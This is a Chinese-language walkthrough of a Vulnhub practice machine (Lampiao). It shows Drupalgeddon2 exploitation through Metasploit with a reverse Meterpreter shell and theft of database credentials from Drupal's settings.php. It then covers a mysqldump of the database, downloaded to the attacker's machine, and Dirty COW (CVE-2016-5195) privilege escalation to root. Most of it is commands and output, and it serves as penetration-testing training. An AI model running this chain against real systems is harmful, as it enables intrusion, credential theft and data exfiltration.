提权(1), 脱裤, dirty-cow 脏牛提权

提权(1), 脱裤, dirty-cow脏牛提权

本实验以打靶为案例演示脱裤和dirty-cow脏牛提权的操作过程.

实验环境:

靶机: https://www.vulnhub.com/entry/lampiao-1,249/

本地: 192.168.112.201, kali
目标: 192.168.112.202

一, 信息搜集

扫描全端口:
nmap -p- 192.168.112.202

22/tcp   open  ssh
80/tcp   open  http
1898/tcp open  cymtec-port

扫描端口服务的版本, 操作系统信息等:
nmap -sV -A 192.168.112.202

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 46b199607d81693cae1fc7ffc366e310 (DSA)
|   2048 f3e888f22dd0b2540b9cad6133595593 (RSA)
|   256 ce632af7536e46e2ae81e3ffb716f452 (ECDSA)
|_  256 c655ca073765e306c1d65b77dc23dfcc (ED25519)
80/tcp open  http?
| fingerprint-strings: 
|   NULL: 
AC Address: 00:0C:29:CB:D6:D6 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

这里发现没有出现80, 1898的指纹. 1898不是常用端口, 单独扫一下看看.
nmap -sV -p1898 192.168.112.202

    1898/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

发现1898端口开着apache, 这可能是个网站, 尝试访问网站.

用浏览器访问80端口, 发现不是网站页面.
用浏览器访问1898端口, 发现网站页面, 观察一下页面.
在页面最下方发现 Powered by Drupal 说明可能是用 Drupal CMS开发的.

扫描网站指纹确认一下:
whatweb 192.168.112.202:1898

Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.24]

二, 漏洞利用

进入MSF, 搜索 Drupal 相关的模块.
search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

选drupal_drupalgeddon2做尝试:
use 1

msf6 exploit(unix/webapp/drupal_drupalgeddon2) >

查看选项参数:
show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

设置 rhosts 和 rport:
set rhosts 192.168.112.202
set rport 1898

执行模块脚本:
run

[*] Started reverse TCP handler on 192.168.112.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 192.168.112.202
[*] Meterpreter session 2 opened (192.168.112.201:4444 -> 192.168.112.202:56586) at 2023-12-01 09:08:43 -0500

meterpreter > 

这里进入了 meterpreter 环境, 漏洞利用成功.

三, 脱裤

反弹shell:
shell

Process 26184 created.
Channel 0 created.

用python开启虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@lampiao:/var/www/html$ 

一般CMS都有默认的配置文件路径, 可以从网上去搜索.
找到 drupal CMS 的配置文件 sites/default/settings.php:
打开文件, 找到数据库的配置信息:

'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'Virgulino',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',

那么这里看到了mysql的用户名, 密码, 数据库名.

检查mysqldump命令:
whereis mysqldump

mysqldump: /usr/bin/mysqldump /usr/share/man/man1/mysqldump.1.gz

脱裤:
mysqldump -udrupaluser -pVirgulino drupal > drupal.sql

退回 meterpreter 控制台:
exit

下载 drupal.sql 文件到本地:
download drupal.sql /root

四, Dirty-Cow 脏牛提权

linux系统尝试脏牛漏洞提权, Dirty-Cow

1. 查看当前用户权限

getuid

Server username: www-data

反弹shell:
shell

Process 27216 created.
Channel 1 created.

用python开启虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’

2. 检查目标的编译环境

python --version
php -v
gcc -v

Python 2.7.6

PHP 5.5.9-1ubuntu4.24 (cli) (built: Mar 16 2018 12:32:06) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
    with Zend OPcache v7.0.3, Copyright (c) 1999-2014, by Zend Technologies
    
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.4)

2. kali搜索脏牛代码

dirty-cow不在msf的模块库中, 所以需要在网上或者kali中单独搜索.
网站搜索: exploit-db.com
searchsploit dirty

-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                            |  Path
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                    | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                    | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)        | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)           | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                              | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)        | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                               | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                                       | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                           | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                                 | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                                  | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                                       | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                                       | linux/local/46362.py
-------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

通常使用 /etc/passwd 方法提权, 40839.c 和 40847.cpp, 这两个是c或c++源码, 需要编译才能使用.

3. 尝试 40847.cpp 提权

查看源码的路径:
searchsploit -p 40847

 Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text

查看源码注释:
vi /usr/share/exploitdb/exploits/linux/local/40847.cpp

// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")

从 meterpreter 上传代码到目标主机/tmp目录下:
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp

反弹shell:
shell

进入虚拟bash:
python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@lampiao:/var/www/html$ 

进入/tmp目录编译源码:
这行代码编译出一个 dcow 可执行文件.
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

<-Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil 

执行程序:
./dcow -s

Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~#          

root提权成功.

查看权限:
id

uid=0(root) gid=0(root) groups=0(root)

修改root密码:
passwd

Enter new UNIX password: root  
Retype new UNIX password: root
passwd: password updated successfully